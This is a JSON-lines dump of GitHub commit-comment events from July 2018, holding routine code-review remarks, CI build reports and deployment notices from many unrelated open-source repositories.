{"id":"7962770532","type":"CommitCommentEvent","actor":{"login":"luisravila"},"repo":{"name":"luisravila/udemy-heroes"},"payload":{"comment":{"id":29701420,"position":null,"line":null,"path":null,"commit_id":"3a80b15d00c9a2923d8b0df97869741169392dc5","created_at":"2018-07-13T15:16:47Z","updated_at":"2018-07-13T15:16:47Z","author_association":"OWNER","body":"Perfecto!, los cambios funcionaron 🍄 "}},"created_at":"2018-07-13T15:16:47Z"}
{"id":"7962770959","type":"CommitCommentEvent","actor":{"login":"lucasmedinacav"},"repo":{"name":"bergben/ng2-img-max"},"payload":{"comment":{"id":29701421,"position":null,"line":null,"path":null,"commit_id":"515782dbef6c7a88c69e1dbcc3fd26509b378e1b","created_at":"2018-07-13T15:16:52Z","updated_at":"2018-07-13T15:16:52Z","author_association":"NONE","body":"this modified results a error:\r\n\r\nERROR in ./node_modules/ng2-pica/ng2-pica.ts\r\nModule build failed: Error: /home/lucasmedian/development/workspaces/plurer/plurer-web/node_modules/ng2-pica/ng2-pica.ts is missing from the TypeScript compilation. Please make sure it is in your tsconfig via the 'files' or 'include' property.\r\nThe missing file seems to be part of a third party library. TS files in published libraries are often a sign of a badly packaged library. Please open an issue in the library repository to alert its author and ask them to package the library using the Angular Package Format (https://goo.gl/jB3GVv).\r\n    at AngularCompilerPlugin.getCompiledFile (/home/lucasmedian/development/workspaces/plurer/plurer-web/node_modules/@ngtools/webpack/src/angular_compiler_plugin.js:677:23)\r\n    at plugin.done.then (/home/lucasmedian/development/workspaces/plurer/plurer-web/node_modules/@ngtools/webpack/src/loader.js:467:39)\r\n    at <anonymous>\r\n    at process._tickCallback (internal/process/next_tick.js:188:7)\r\n"}},"created_at":"2018-07-13T15:16:52Z"}
{"id":"7962776907","type":"CommitCommentEvent","actor":{"login":"sixtyfive"},"repo":{"name":"surayt/wordcabin"},"payload":{"comment":{"id":29701437,"position":null,"line":null,"path":null,"commit_id":"fd166e43b53563b07901f7e7a67c784cf2cf9644","created_at":"2018-07-13T15:17:56Z","updated_at":"2018-07-13T15:17:56Z","author_association":"CONTRIBUTOR","body":"Wow, interesting! We're mostly working in our own GitLab instance, where it is the right Jean. I didn't think old commits (esp. to random projects, from your perspective, right?) would still create notifications here. Sorry for that!"}},"created_at":"2018-07-13T15:17:56Z"}
{"id":"7962780184","type":"CommitCommentEvent","actor":{"login":"ekivolowitz"},"repo":{"name":"ekivolowitz/curl"},"payload":{"comment":{"id":29701447,"position":1,"line":1,"path":"README","commit_id":"ee394336dbdfd8523597fc4653ab186c47d51469","created_at":"2018-07-13T15:18:32Z","updated_at":"2018-07-13T15:18:32Z","author_association":"OWNER","body":"Lel I just needed a commit to push it through travis to see what happens. No content here bois. "}},"created_at":"2018-07-13T15:18:32Z"}
{"id":"7962784806","type":"CommitCommentEvent","actor":{"login":"e-shere"},"repo":{"name":"martynwinn/map-recognition"},"payload":{"comment":{"id":29701459,"position":null,"line":null,"path":null,"commit_id":"08c96a561227e0fd8192990d8ae9351142293be8","created_at":"2018-07-13T15:19:23Z","updated_at":"2018-07-13T15:19:23Z","author_association":"COLLABORATOR","body":"Changing the penultimate dense layer size from 80 to 10 seems to improve the results"}},"created_at":"2018-07-13T15:19:23Z"}
{"id":"7962786520","type":"CommitCommentEvent","actor":{"login":"gavin-schaeferle"},"repo":{"name":"gavin-schaeferle/python_flask_ibm"},"payload":{"comment":{"id":29701463,"position":null,"line":null,"path":null,"commit_id":"e84df4df27915f32a9f245e9d765f9fba5d47b20","created_at":"2018-07-13T15:19:41Z","updated_at":"2018-07-13T15:19:41Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/77bcaea4-21aa-4d04-8c1b-d3f74100547e?env_id=ibm%3Ayp%3Aus-south \"myToolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/3a59dec4-b069-424f-af82-e120a52c23d8?env_id=ibm%3Ayp%3Aus-south \"myPipeline1\") deployed [python_flask_ibm](https://github.com/gavin-schaeferle/python_flask_ibm/releases/tag/deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-151940 \"deploy-ibm-yp-us-south-gavin.schaeferle-ibm.com-dev-20180713-151940\") to [dev](https://console.bluemix.net/apps/07f4811d-6f2e-4402-bf81-7a955f6e2ab8?env_id=ibm:yp:us-south \"ibm:yp:us-south:gavin.schaeferle@ibm.com:dev\"), including this commit"}},"created_at":"2018-07-13T15:19:41Z"}
{"id":"7962787182","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29701464,"position":null,"line":null,"path":null,"commit_id":"ff89375d061321e516d76eef37cd214129edade1","created_at":"2018-07-13T15:19:48Z","updated_at":"2018-07-13T15:19:48Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-45](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-45).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-45-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-13T15:19:48Z"}
{"id":"7962802422","type":"CommitCommentEvent","actor":{"login":"masterBaster"},"repo":{"name":"masterBaster/angular-tour-of-heroes"},"payload":{"comment":{"id":29701492,"position":24,"line":32,"path":"angular-tour-of-heroes/src/app/heroes/heroes.component.ts","commit_id":"31710b528e20cb1521416222fcfa7e77b33b4515","created_at":"2018-07-13T15:22:27Z","updated_at":"2018-07-13T15:22:27Z","author_association":"OWNER","body":"Add a private heroService parameter of type HeroService to the constructor."}},"created_at":"2018-07-13T15:22:27Z"}
{"id":"7962804867","type":"CommitCommentEvent","actor":{"login":"pendo324"},"repo":{"name":"pendo324/node-steam"},"payload":{"comment":{"id":29701497,"position":4,"line":22,"path":"lib/handlers/user/index.js","commit_id":"22bcda6066328da5963b403b1fd5bcd4cf3ce067","created_at":"2018-07-13T15:22:56Z","updated_at":"2018-07-13T15:22:56Z","author_association":"OWNER","body":"I think you have to add the property `this._client`, because if you just add it to `this`, only instances of SteamUser that had `.logOn` called will have `_logOnDetails`. I did some testing and experienced this myself. Maybe my setup is just broken though"}},"created_at":"2018-07-13T15:22:56Z"}
{"id":"7962805052","type":"CommitCommentEvent","actor":{"login":"masterBaster"},"repo":{"name":"masterBaster/angular-tour-of-heroes"},"payload":{"comment":{"id":29701498,"position":17,"line":26,"path":"angular-tour-of-heroes/src/app/heroes/heroes.component.ts","commit_id":"31710b528e20cb1521416222fcfa7e77b33b4515","created_at":"2018-07-13T15:22:58Z","updated_at":"2018-07-13T15:22:58Z","author_association":"OWNER","body":"Replace the definition of the heroes property with a simple declaration."}},"created_at":"2018-07-13T15:22:58Z"}
{"id":"7962810277","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29701529,"position":1,"line":null,"path":"1531495432.23/github_test.txt","commit_id":"b21202c4633a51dd3e854d3eda513e44241d2126","created_at":"2018-07-13T15:23:54Z","updated_at":"2018-07-13T15:23:54Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-13T15:23:54Z"}
{"id":"7962811346","type":"CommitCommentEvent","actor":{"login":"aciidb0mb3r"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":29701532,"position":47,"line":57,"path":"Sources/PackageLoading/ManifestLoader.swift","commit_id":"9c16353d06c071d365fe1cb1939748c07f0a2286","created_at":"2018-07-13T15:24:08Z","updated_at":"2018-07-13T15:24:08Z","author_association":"OWNER","body":"2 x oh"}},"created_at":"2018-07-13T15:24:08Z"}
{"id":"7962814364","type":"CommitCommentEvent","actor":{"login":"artbear"},"repo":{"name":"silverbulleters/vanessa-runner"},"payload":{"comment":{"id":29701534,"position":47,"line":231,"path":"src/Классы/КомандаТестирование_xUnitFor1C.os","commit_id":"8efa0b676c4378e7ea63fd7ed47ba09379c9c660","created_at":"2018-07-13T15:24:42Z","updated_at":"2018-07-13T15:24:42Z","author_association":"COLLABORATOR","body":"@VladFrost Исправил в develop"}},"created_at":"2018-07-13T15:24:42Z"}
{"id":"7962836703","type":"CommitCommentEvent","actor":{"login":"JanMiksovsky"},"repo":{"name":"elix/elix"},"payload":{"comment":{"id":29701585,"position":null,"line":null,"path":null,"commit_id":"c1fd7fbcac1ebb4212c87bd6f25e196faf9421bd","created_at":"2018-07-13T15:28:47Z","updated_at":"2018-07-13T15:28:47Z","author_association":"MEMBER","body":"Sigh. From the tenor of those issues, it sounds like the TS team is open to a fix, but this isn't a priority for the team itself. Not sure what we can do about that other than defer upgrading TS for a while and hope it gets fixed.\r\n\r\nAs far as I know, our approach to using symbols is a completely valid use of the language: it lets mixins avoid unintentional name conflicts. If a component happened to have a member with the string name \"raiseChangeEvents\", none of our mixins would acccidentally step on it. Anyone that wants to use `symbols.raiseChangeEvents` has to explicitly import symbols.js (or go through gyrations with `getOwnPropertySymbols`)."}},"created_at":"2018-07-13T15:28:47Z"}
{"id":"7962837801","type":"CommitCommentEvent","actor":{"login":"bparees"},"repo":{"name":"jboss-fuse/application-templates"},"payload":{"comment":{"id":29701591,"position":18,"line":37,"path":"fis-image-streams.json","commit_id":"400bea1de0fd576e5ab4f256f2c314268a1c0a0c","created_at":"2018-07-13T15:28:59Z","updated_at":"2018-07-13T15:28:59Z","author_association":"NONE","body":"no problem, thanks for jumping on it so quickly!"}},"created_at":"2018-07-13T15:28:59Z"}
{"id":"7962838493","type":"CommitCommentEvent","actor":{"login":"suthagar23"},"repo":{"name":"openmrs/openmrs-module-locationbasedaccess"},"payload":{"comment":{"id":29701592,"position":13,"line":57,"path":"api/src/main/java/org/openmrs/module/locationbasedaccess/PatientSearchAdviser.java","commit_id":"dc1f2548225252ed3356e967bee0e402c2f4d8a6","created_at":"2018-07-13T15:29:09Z","updated_at":"2018-07-13T15:29:09Z","author_association":"MEMBER","body":"Yes understood, Just add a fix to resolve this issue. Please see here - https://github.com/openmrs/openmrs-module-locationbasedaccess/pull/16\r\n"}},"created_at":"2018-07-13T15:29:09Z"}
{"id":"7962841662","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29701597,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T15:29:41Z","updated_at":"2018-07-13T15:29:41Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2331 of 2331 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-13T15:29:41Z"}
{"id":"7962855313","type":"CommitCommentEvent","actor":{"login":"mel-ding"},"repo":{"name":"TheraFu/QuestionKitchen-Frontend"},"payload":{"comment":{"id":29701619,"position":null,"line":null,"path":null,"commit_id":"c9b59d07c2af437a3cbdda338ce848e48bbcdec3","created_at":"2018-07-13T15:32:07Z","updated_at":"2018-07-13T15:32:07Z","author_association":"COLLABORATOR","body":"- add icons to questions (comment, like, save to worksheet) \r\n- add display for number of comments \r\n- fix overflow in subjects\r\n- changed cursor type to select "}},"created_at":"2018-07-13T15:32:07Z"}
{"id":"7962868390","type":"CommitCommentEvent","actor":{"login":"kenvandine"},"repo":{"name":"ubuntu/snapcraft-desktop-helpers"},"payload":{"comment":{"id":29701647,"position":5,"line":40,"path":"common/init","commit_id":"c3141573c6ef53d2cb35b5fc1f02ad74afdee5b2","created_at":"2018-07-13T15:34:30Z","updated_at":"2018-07-13T15:34:30Z","author_association":"MEMBER","body":"Wouldn't that be too greedy?  For example what if a snap has the word classic in the description, etc?"}},"created_at":"2018-07-13T15:34:30Z"}
{"id":"7962868829","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29701648,"position":null,"line":null,"path":null,"commit_id":"dc2fc3994f93274ddce3cef6177a1b5ecb0c5863","created_at":"2018-07-13T15:34:34Z","updated_at":"2018-07-13T15:34:34Z","author_association":"NONE","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dc2fc3994f93274ddce3cef6177a1b5ecb0c5863-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-13T15:34:34Z"}
{"id":"7962870157","type":"CommitCommentEvent","actor":{"login":"styfle"},"repo":{"name":"styfle/mma-api"},"payload":{"comment":{"id":29701651,"position":null,"line":null,"path":null,"commit_id":"10fe9b8231a2e5cc9efa97952cab133eb3e2f081","created_at":"2018-07-13T15:34:50Z","updated_at":"2018-07-13T15:34:50Z","author_association":"OWNER","body":"@elliott1130 If you want to run this locally, you need to install [node.js](https://nodejs.org) and [git](https://git-scm.com).\r\n\r\nThen run this from your terminal:\r\n\r\n```\r\ngit clone https://github.com/styfle/mma-api\r\ncd mma-api\r\nnpm install\r\nnpm run\r\n```\r\n\r\nThen you can visit http://localhost:3000\r\n\r\nBut it's probably easier to just use the public API endpoint that I deployed here: https://mma.now.sh"}},"created_at":"2018-07-13T15:34:50Z"}
{"id":"7962874686","type":"CommitCommentEvent","actor":{"login":"ddemidov"},"repo":{"name":"mattijsjanssens/mattijs-extensions"},"payload":{"comment":{"id":29701657,"position":119,"line":519,"path":"applications/test/amgcl/amgclSolver/amgclSolver.C","commit_id":"742c500c1c588af61613366b3667fbac17fdc7db","created_at":"2018-07-13T15:35:38Z","updated_at":"2018-07-13T15:35:38Z","author_association":"NONE","body":"I've recently added a \"Full-AMG\" parallel version, which works much better than subdomain deflation, see [1] for an example, [2] and [3] for comparison of strong and weak scalability with Trilinos ML. [4] has comparison of the subdomain deflation with Trilinos ML.\r\n\r\n[1] https://github.com/ddemidov/amgcl/blob/master/examples/mpi/mpi_amg.cpp \r\n[2] http://nbviewer.jupyter.org/gist/ddemidov/be3175832f5aefae34dfbdc4748129f0\r\n[3] http://nbviewer.jupyter.org/gist/ddemidov/635eab912208bef5bada382608dab4e8\r\n[4] https://arxiv.org/abs/1710.03940"}},"created_at":"2018-07-13T15:35:38Z"}
{"id":"7962875279","type":"CommitCommentEvent","actor":{"login":"cuavas"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29701663,"position":5,"line":1291,"path":"hash/x68k_flop.xml","commit_id":"a5bca54a8a014e4c35a7a4ea19a48d70b40c8850","created_at":"2018-07-13T15:35:45Z","updated_at":"2018-07-13T15:35:45Z","author_association":"MEMBER","body":"Eugh there's mixed case within the CRC there (lowercase 'b', uppercase 'D')."}},"created_at":"2018-07-13T15:35:45Z"}
{"id":"7962878471","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701669,"position":15,"line":14,"path":"src/js/main.js","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:36:21Z","updated_at":"2018-07-13T15:36:21Z","author_association":"CONTRIBUTOR","body":"試著把 `ss-prpl` `ss-red` ... \b抽出來放到個別 html element（ex: data-target=\"ss-prpl\"） 上，點擊時去讀 data-target 的內容再去 toggle"}},"created_at":"2018-07-13T15:36:21Z"}
{"id":"7962893031","type":"CommitCommentEvent","actor":{"login":"kargaranamir"},"repo":{"name":"kargaranamir/kargaranamir.github.io"},"payload":{"comment":{"id":29701682,"position":null,"line":null,"path":null,"commit_id":"d791184e2d5ffb8bd8a93e764a9b4398eca49993","created_at":"2018-07-13T15:39:07Z","updated_at":"2018-07-13T15:39:07Z","author_association":"OWNER","body":"update cv"}},"created_at":"2018-07-13T15:39:07Z"}
{"id":"7962896810","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29701693,"position":null,"line":null,"path":null,"commit_id":"0d62db33831344ae5d9e645043bf3ca3985841e2","created_at":"2018-07-13T15:39:49Z","updated_at":"2018-07-13T15:39:49Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-react](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-react).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-react-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-13T15:39:49Z"}
{"id":"7962897928","type":"CommitCommentEvent","actor":{"login":"akccakcctw"},"repo":{"name":"UserInterfaceForFun/sass_practice"},"payload":{"comment":{"id":29701695,"position":71,"line":68,"path":"src/sass/_base.scss","commit_id":"167a497ac68504a317dbe9712d77b7eed4013a3f","created_at":"2018-07-13T15:40:03Z","updated_at":"2018-07-13T15:40:03Z","author_association":"CONTRIBUTOR","body":"盡量不要直接對 html tag 下樣式，給他一個 class"}},"created_at":"2018-07-13T15:40:03Z"}
{"id":"7962898342","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701698,"position":7,"line":7,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:40:09Z","updated_at":"2018-07-13T15:40:09Z","author_association":"CONTRIBUTOR","body":"how about prepending a module and then calling super ?"}},"created_at":"2018-07-13T15:40:09Z"}
{"id":"7962904098","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701706,"position":7,"line":7,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:41:11Z","updated_at":"2018-07-13T15:41:11Z","author_association":"CONTRIBUTOR","body":"making the alias `create` breaks down if there are multiple aliases too, usually something like `initialize_without_ out_of_range ` would be used"}},"created_at":"2018-07-13T15:41:11Z"}
{"id":"7962905521","type":"CommitCommentEvent","actor":{"login":"tpilz"},"repo":{"name":"tpilz/lumpR"},"payload":{"comment":{"id":29701712,"position":77,"line":133,"path":"R/db_create.R","commit_id":"fd98a211632f85e789140828967957129b127ede","created_at":"2018-07-13T15:41:26Z","updated_at":"2018-07-13T15:41:26Z","author_association":"OWNER","body":"@TillF This does not work, as it returns `logical(0)` in case `overwrite` is `NULL`!"}},"created_at":"2018-07-13T15:41:26Z"}
{"id":"7962906451","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-remittance"},"payload":{"comment":{"id":29701717,"position":98,"line":88,"path":"contracts/Remittance.sol","commit_id":"207c48ae10d1664841e3b61101b01182ac77507a","created_at":"2018-07-13T15:41:36Z","updated_at":"2018-07-13T15:41:36Z","author_association":"OWNER","body":"If I understand correctly, I can use the deadline variable to also store information about the sender. So I must try to convert a uint8 variable (epoch time) into a bytes12 and then concatenate the 160 bits address (bytes20) to finally get a bytes32. Really ? So how does Bob's password come into play here. LOL! Don't tell the solution, I only have the feeling I am mixing up things :-)"}},"created_at":"2018-07-13T15:41:36Z"}
{"id":"7962909221","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701723,"position":12,"line":12,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:42:08Z","updated_at":"2018-07-13T15:42:08Z","author_association":"CONTRIBUTOR","body":"This should be under the `@out_of_range` assignment so a rescued errors pagy is `out_of_range?`"}},"created_at":"2018-07-13T15:42:08Z"}
{"id":"7962911549","type":"CommitCommentEvent","actor":{"login":"berndsi"},"repo":{"name":"wikimedia/restbase"},"payload":{"comment":{"id":29701737,"position":null,"line":null,"path":null,"commit_id":"f33bfc3451800de86b75b6b95e573db6eca595a0","created_at":"2018-07-13T15:42:36Z","updated_at":"2018-07-13T15:42:36Z","author_association":"CONTRIBUTOR","body":"Ok, I guess we don't care too much about the `project/*.yaml` files then. I was trying to get a test to fail before adding the entries for a new endpoint. But without the `project/*.yaml` entries the monitoring tests wouldn't know that the new endpoint is supposed to exist. Ok, next time I'll start with adding the `project/*.yaml` entries before adding the actual spec.yaml file for the endpoint."}},"created_at":"2018-07-13T15:42:36Z"}
{"id":"7962912161","type":"CommitCommentEvent","actor":{"login":"dark-1"},"repo":{"name":"topjohnwu/MagiskManager"},"payload":{"comment":{"id":29701738,"position":null,"line":null,"path":null,"commit_id":"b885ccbd632eddcabc13781a10d3fec4a4215b39","created_at":"2018-07-13T15:42:42Z","updated_at":"2018-07-13T15:42:42Z","author_association":"NONE","body":"> Same here for me, after updating MagiskManager the app hang on the Mask screen   \r\n    \r\nSame thing happens to me,    \r\nBut will this happen if I have latest Magisk with MagiskManager v5.7.0 ?   \r\n   \r\nThanking You, Best regards 👍 "}},"created_at":"2018-07-13T15:42:42Z"}
{"id":"7962912628","type":"CommitCommentEvent","actor":{"login":"crossbr"},"repo":{"name":"protonspring/Stockfish"},"payload":{"comment":{"id":29701740,"position":null,"line":null,"path":null,"commit_id":"22c8b430e24cd7f9e17e48abf436c299e8b6cf9a","created_at":"2018-07-13T15:42:47Z","updated_at":"2018-07-13T15:42:47Z","author_association":"NONE","body":"Nice simplification. Congrats!"}},"created_at":"2018-07-13T15:42:47Z"}
{"id":"7962913609","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701743,"position":26,"line":26,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:42:58Z","updated_at":"2018-07-13T15:42:58Z","author_association":"CONTRIBUTOR","body":"if misconfigured this would get into a weird state, should be `else raise ArgumentError, \"Unknown mode #{@vars[: out_of_range_mode]}\"`"}},"created_at":"2018-07-13T15:42:58Z"}
{"id":"7962917575","type":"CommitCommentEvent","actor":{"login":"otisg"},"repo":{"name":"sematext/docs"},"payload":{"comment":{"id":29701750,"position":3,"line":2,"path":"docs/monitoring/chef-recipe.md","commit_id":"7d32fa849f8b5f5ed0ab905c0c8c1906ce151ffc","created_at":"2018-07-13T15:43:46Z","updated_at":"2018-07-13T15:43:46Z","author_association":"MEMBER","body":"@goranbajic typo"}},"created_at":"2018-07-13T15:43:46Z"}
{"id":"7962918083","type":"CommitCommentEvent","actor":{"login":"tsteven4"},"repo":{"name":"gpsbabel/gpsbabel"},"payload":{"comment":{"id":29701751,"position":22,"line":51,"path":"arcdist.cc","commit_id":"6dcf6aa3e5e2115f2fb06c95859329b0ed61a966","created_at":"2018-07-13T15:43:52Z","updated_at":"2018-07-13T15:43:52Z","author_association":"COLLABORATOR","body":"Isn't these series of static_casts better replaced with\r\nWaypoint* waypointp = reinterpret_cast<Waypoint*>(elem);\r\n?"}},"created_at":"2018-07-13T15:43:52Z"}
{"id":"7962919928","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701758,"position":21,"line":21,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:44:13Z","updated_at":"2018-07-13T15:44:13Z","author_association":"CONTRIBUTOR","body":"idk how is super supposed to work if this is an override ... docs on that would be nice"}},"created_at":"2018-07-13T15:44:13Z"}
{"id":"7962921564","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701762,"position":21,"line":21,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:44:32Z","updated_at":"2018-07-13T15:44:32Z","author_association":"CONTRIBUTOR","body":"ah nvm this is for series"}},"created_at":"2018-07-13T15:44:32Z"}
{"id":"7962922245","type":"CommitCommentEvent","actor":{"login":"KeLorean"},"repo":{"name":"qmk/qmk_firmware"},"payload":{"comment":{"id":29701764,"position":null,"line":null,"path":null,"commit_id":"bc126f0deb6e8bccd330894adebfbdaa9d68dd33","created_at":"2018-07-13T15:44:39Z","updated_at":"2018-07-13T15:44:39Z","author_association":"CONTRIBUTOR","body":"tidied up  links and added more resources that already existed in the docs"}},"created_at":"2018-07-13T15:44:39Z"}
{"id":"7962926140","type":"CommitCommentEvent","actor":{"login":"ddnexus"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701775,"position":12,"line":12,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:45:23Z","updated_at":"2018-07-13T15:45:23Z","author_association":"OWNER","body":"I thought about this and I decided to put it after because the `:exception` mode should actually obliterate the extra, but what you say makes sense and doesn't harm anything. I will move it before."}},"created_at":"2018-07-13T15:45:23Z"}
{"id":"7962927170","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701777,"position":19,"line":19,"path":"lib/pagy/extras/out_of_range.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:45:35Z","updated_at":"2018-07-13T15:45:35Z","author_association":"CONTRIBUTOR","body":"this is kinda hacky/hard to debug ... would be nicer to override series and check `@out_of_range` in there"}},"created_at":"2018-07-13T15:45:35Z"}
{"id":"7962929558","type":"CommitCommentEvent","actor":{"login":"vbrrt"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29701782,"position":36,"line":90,"path":"app/src/main/java/com/example/android/miwok/WordAdapter.java","commit_id":"adf90d17fa802b2b5229d29faebee4b3991017b1","created_at":"2018-07-13T15:46:01Z","updated_at":"2018-07-13T15:46:01Z","author_association":"NONE","body":"Got it. Thank you."}},"created_at":"2018-07-13T15:46:01Z"}
{"id":"7962929914","type":"CommitCommentEvent","actor":{"login":"Whyounes"},"repo":{"name":"NextmediaMa/nextstarter"},"payload":{"comment":{"id":29701785,"position":246,"line":246,"path":"htdocs/content/themes/nextstarter-theme/functions.php","commit_id":"a8cc4579a711e9ab80675ce544867d36458a68f3","created_at":"2018-07-13T15:46:06Z","updated_at":"2018-07-13T15:46:06Z","author_association":"NONE","body":"@zouhirB According to the DocBlock, IF I'm an admin and I don't have the necessary role it will redirect to home and exit.\r\nWhat if I'm not an admin? Shouldn't we have else to redirect home and exit?"}},"created_at":"2018-07-13T15:46:06Z"}
{"id":"7962931047","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/Sprint-Challenge--Redux"},"payload":{"comment":{"id":29701790,"position":null,"line":null,"path":null,"commit_id":"8b093f0908be9c1156f07abca407e391dc5a059e","created_at":"2018-07-13T15:46:18Z","updated_at":"2018-07-13T15:46:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Initialize Project](https://trello.com/c/sCviEWoL/2-initialize-project)"}},"created_at":"2018-07-13T15:46:18Z"}
{"id":"7962934669","type":"CommitCommentEvent","actor":{"login":"491267787"},"repo":{"name":"491267787/491267787.github.io"},"payload":{"comment":{"id":29701797,"position":null,"line":null,"path":null,"commit_id":"e16345b7bc1bc5e0539462e3023045153fdc3788","created_at":"2018-07-13T15:47:00Z","updated_at":"2018-07-13T15:47:00Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-13T15:47:00Z"}
{"id":"7962935176","type":"CommitCommentEvent","actor":{"login":"Whyounes"},"repo":{"name":"NextmediaMa/nextstarter"},"payload":{"comment":{"id":29701799,"position":6,"line":6,"path":"htdocs/content/themes/nextstarter-theme/languages/fr_BE.po","commit_id":"a8cc4579a711e9ab80675ce544867d36458a68f3","created_at":"2018-07-13T15:47:07Z","updated_at":"2018-07-13T15:47:07Z","author_association":"NONE","body":"Julien is not part of our team 😅 "}},"created_at":"2018-07-13T15:47:07Z"}
{"id":"7962935192","type":"CommitCommentEvent","actor":{"login":"491267787"},"repo":{"name":"491267787/491267787.github.io"},"payload":{"comment":{"id":29701801,"position":null,"line":null,"path":null,"commit_id":"e16345b7bc1bc5e0539462e3023045153fdc3788","created_at":"2018-07-13T15:47:07Z","updated_at":"2018-07-13T15:47:07Z","author_association":"OWNER","body":"aa"}},"created_at":"2018-07-13T15:47:07Z"}
{"id":"7962937000","type":"CommitCommentEvent","actor":{"login":"grosser"},"repo":{"name":"ddnexus/pagy"},"payload":{"comment":{"id":29701808,"position":55,"line":55,"path":"test/pagy/extras/out_of_range_test.rb","commit_id":"c52db2ac549b37362ef68dd98240427836fef76c","created_at":"2018-07-13T15:47:26Z","updated_at":"2018-07-13T15:47:26Z","author_association":"CONTRIBUTOR","body":"the newline mode is inconsistent ... either don't have newlines after describe+before end or do"}},"created_at":"2018-07-13T15:47:26Z"}
